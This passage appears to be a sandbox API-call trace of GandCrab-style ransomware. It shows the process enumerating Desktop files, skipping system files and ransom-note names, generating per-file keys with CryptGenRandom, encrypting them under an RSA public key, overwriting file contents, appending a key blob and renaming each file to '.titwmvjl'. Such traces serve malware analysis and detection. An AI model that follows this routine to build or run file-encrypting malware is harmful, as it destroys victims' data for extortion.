dwFlags=0x0) returned 1 [0088.949] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.949] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.949] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x1823b, lpOverlapped=0x0) returned 1 [0088.956] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffe7dc5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.957] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1823b, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x1823b, lpOverlapped=0x0) returned 1 [0088.959] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.959] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0088.960] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.963] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.964] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.964] CloseHandle (hObject=0x2b4) returned 1 [0088.965] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\x5 95.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\x5 95.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\x5 95.wav.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\x5 95.wav.titwmvjl"), dwFlags=0x1) returned 1 [0088.965] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.965] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0088.966] lstrcmpW (lpString1="Zs7Lv7v2QS.swf", lpString2=".") returned 1 [0088.966] lstrcmpW (lpString1="Zs7Lv7v2QS.swf", lpString2="..") returned 1 [0088.966] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\", lpString2="Zs7Lv7v2QS.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\Zs7Lv7v2QS.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\Zs7Lv7v2QS.swf" [0088.966] lstrlenW (lpString=".titwmvjl") returned 9 [0088.966] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\Zs7Lv7v2QS.swf") returned 61 [0088.966] VirtualAlloc (lpAddress=0x0, dwSize=0xba, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.966] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\Zs7Lv7v2QS.swf.titwmvjl") returned 70 [0088.966] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\Zs7Lv7v2QS.swf") returned 61 [0088.966] lstrlenW (lpString=".swf") returned 4 [0088.966] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.966] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".swf ") returned 5 [0088.966] lstrcmpiW (lpString1=".swf", lpString2=".titwmvjl") returned -1 [0088.966] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.966] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\Zs7Lv7v2QS.swf") returned 61 [0088.966] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\Zs7Lv7v2QS.swf") returned 61 [0088.966] lstrcmpiW (lpString1="Zs7Lv7v2QS.swf", lpString2="desktop.ini") returned 1 [0088.966] lstrcmpiW (lpString1="Zs7Lv7v2QS.swf", lpString2="autorun.inf") returned 1 [0088.966] lstrcmpiW (lpString1="Zs7Lv7v2QS.swf", lpString2="ntuser.dat") returned 1 [0088.966] lstrcmpiW (lpString1="Zs7Lv7v2QS.swf", lpString2="iconcache.db") returned 1 [0088.967] lstrcmpiW (lpString1="Zs7Lv7v2QS.swf", lpString2="bootsect.bak") returned 1 [0088.967] lstrcmpiW (lpString1="Zs7Lv7v2QS.swf", lpString2="boot.ini") returned 1 [0088.967] lstrcmpiW (lpString1="Zs7Lv7v2QS.swf", lpString2="ntuser.dat.log") returned 1 [0088.967] lstrcmpiW (lpString1="Zs7Lv7v2QS.swf", lpString2="thumbs.db") returned 1 [0088.967] lstrcmpiW (lpString1="Zs7Lv7v2QS.swf", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0088.967] lstrcmpiW (lpString1="Zs7Lv7v2QS.swf", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0088.967] lstrcmpiW (lpString1="Zs7Lv7v2QS.swf", lpString2="KRAB-DECRYPT.html") returned 1 [0088.967] lstrcmpiW (lpString1="Zs7Lv7v2QS.swf", lpString2="CRAB-DECRYPT.html") returned 1 [0088.967] lstrcmpiW (lpString1="Zs7Lv7v2QS.swf", lpString2="KRAB-DECRYPT.txt") returned 1 [0088.967] lstrcmpiW (lpString1="Zs7Lv7v2QS.swf", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.967] lstrcmpiW (lpString1="Zs7Lv7v2QS.swf", lpString2="ntldr") returned 1 [0088.967] lstrcmpiW (lpString1="Zs7Lv7v2QS.swf", lpString2="NTDETECT.COM") returned 1 [0088.967] lstrcmpiW (lpString1="Zs7Lv7v2QS.swf", lpString2="Bootfont.bin") returned 1 [0088.967] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\Zs7Lv7v2QS.swf") returned 61 [0088.967] lstrlenW (lpString=".swf") returned 4 [0088.967] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.967] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".swf ") returned 5 [0088.967] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.967] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.967] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\Zs7Lv7v2QS.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\zs7lv7v2qs.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0088.968] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.968] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0088.968] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.968] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.969] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0088.970] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.970] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.970] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.970] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0088.971] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.971] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.971] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.971] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.971] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0088.972] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.972] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.972] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.972] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0088.973] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.973] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.973] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.973] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.973] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0088.974] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.974] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5036f8) returned 1 [0088.974] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.974] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0088.974] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.975] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0088.975] GetLastError () returned 0x0 [0088.975] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.975] CryptDestroyKey (hKey=0x5036f8) returned 1 [0088.975] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.975] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.975] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.975] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0088.976] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.976] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503338) returned 1 [0088.977] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.977] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0088.977] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.977] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0088.977] GetLastError () returned 0x0 [0088.977] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.977] CryptDestroyKey (hKey=0x503338) returned 1 [0088.977] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.977] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.977] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.978] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.978] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x39dc, lpOverlapped=0x0) returned 1 [0088.984] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffc624, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.984] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x39dc, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x39dc, lpOverlapped=0x0) returned 1 [0088.985] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.985] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0088.986] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.990] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.990] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.990] CloseHandle (hObject=0x2b4) returned 1 [0088.991] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\Zs7Lv7v2QS.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\zs7lv7v2qs.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\Zs7Lv7v2QS.swf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\zs7lv7v2qs.swf.titwmvjl"), dwFlags=0x1) returned 1 [0088.991] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.992] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0 [0088.992] FindClose (in: hFindFile=0x503438 | out: hFindFile=0x503438) returned 1 [0088.992] CloseHandle (hObject=0x2ac) returned 1 [0088.992] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0088.992] lstrcmpW (lpString1="HhfN1hggoxlCjbyE9V5.flv", lpString2=".") returned 1 [0088.992] lstrcmpW (lpString1="HhfN1hggoxlCjbyE9V5.flv", lpString2="..") returned 1 [0088.993] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="HhfN1hggoxlCjbyE9V5.flv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HhfN1hggoxlCjbyE9V5.flv") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HhfN1hggoxlCjbyE9V5.flv" [0088.993] lstrlenW (lpString=".titwmvjl") returned 9 [0088.993] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HhfN1hggoxlCjbyE9V5.flv") returned 53 [0088.993] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.993] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HhfN1hggoxlCjbyE9V5.flv.titwmvjl") returned 62 [0088.993] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HhfN1hggoxlCjbyE9V5.flv") returned 53 [0088.993] lstrlenW (lpString=".flv") returned 4 [0088.993] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.993] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".flv ") returned 5 [0088.993] lstrcmpiW (lpString1=".flv", lpString2=".titwmvjl") returned -1 [0088.993] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.993] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HhfN1hggoxlCjbyE9V5.flv") returned 53 [0088.993] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HhfN1hggoxlCjbyE9V5.flv") returned 53 [0088.993] lstrcmpiW (lpString1="HhfN1hggoxlCjbyE9V5.flv", lpString2="desktop.ini") returned 1 [0088.993] lstrcmpiW (lpString1="HhfN1hggoxlCjbyE9V5.flv", lpString2="autorun.inf") returned 1 [0088.993] lstrcmpiW (lpString1="HhfN1hggoxlCjbyE9V5.flv", lpString2="ntuser.dat") returned -1 [0088.993] lstrcmpiW (lpString1="HhfN1hggoxlCjbyE9V5.flv", lpString2="iconcache.db") returned -1 [0088.993] lstrcmpiW (lpString1="HhfN1hggoxlCjbyE9V5.flv", lpString2="bootsect.bak") returned 1 [0088.993] lstrcmpiW (lpString1="HhfN1hggoxlCjbyE9V5.flv", lpString2="boot.ini") returned 1 [0088.993] lstrcmpiW (lpString1="HhfN1hggoxlCjbyE9V5.flv", lpString2="ntuser.dat.log") returned -1 [0088.993] lstrcmpiW (lpString1="HhfN1hggoxlCjbyE9V5.flv", lpString2="thumbs.db") returned -1 [0088.993] lstrcmpiW (lpString1="HhfN1hggoxlCjbyE9V5.flv", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.993] lstrcmpiW (lpString1="HhfN1hggoxlCjbyE9V5.flv", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.993] lstrcmpiW (lpString1="HhfN1hggoxlCjbyE9V5.flv", lpString2="KRAB-DECRYPT.html") returned -1 [0088.993] lstrcmpiW (lpString1="HhfN1hggoxlCjbyE9V5.flv", lpString2="CRAB-DECRYPT.html") returned 1 [0088.994] lstrcmpiW (lpString1="HhfN1hggoxlCjbyE9V5.flv", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.994] lstrcmpiW (lpString1="HhfN1hggoxlCjbyE9V5.flv", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.994] lstrcmpiW (lpString1="HhfN1hggoxlCjbyE9V5.flv", lpString2="ntldr") returned -1 [0088.994] lstrcmpiW (lpString1="HhfN1hggoxlCjbyE9V5.flv", lpString2="NTDETECT.COM") returned -1 [0088.994] lstrcmpiW (lpString1="HhfN1hggoxlCjbyE9V5.flv", lpString2="Bootfont.bin") returned 1 [0088.994] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HhfN1hggoxlCjbyE9V5.flv") returned 53 [0088.994] lstrlenW (lpString=".flv") returned 4 [0088.994] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.994] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".flv ") returned 5 [0088.994] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.994] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.994] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\HhfN1hggoxlCjbyE9V5.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\hhfn1hggoxlcjbye9v5.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0088.995] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.995] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0088.995] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.995] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.996] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0088.997] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.997] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.997] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.997] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0088.997] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.997] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.997] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.998] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.998] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0088.999] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.999] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.999] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.999] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0088.999] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.999] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.999] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.999] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.000] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.001] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.001] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503578) returned 1 [0089.001] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.002] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.002] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.002] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.002] GetLastError () returned 0x0 [0089.002] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.002] CryptDestroyKey (hKey=0x503578) returned 1 [0089.002] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.002] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.002] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.002] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.003] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.004] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5032f8) returned 1 [0089.004] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.004] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.004] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.004] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.004] GetLastError () returned 0x0 [0089.004] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.004] CryptDestroyKey (hKey=0x5032f8) returned 1 [0089.004] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.005] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.005] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.005] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.005] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xc0d9, lpOverlapped=0x0) returned 1 [0089.011] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff3f27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.011] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xc0d9, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xc0d9, lpOverlapped=0x0) returned 1 [0089.013] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.013] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0089.014] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.018] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.018] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.018] CloseHandle (hObject=0x2ac) returned 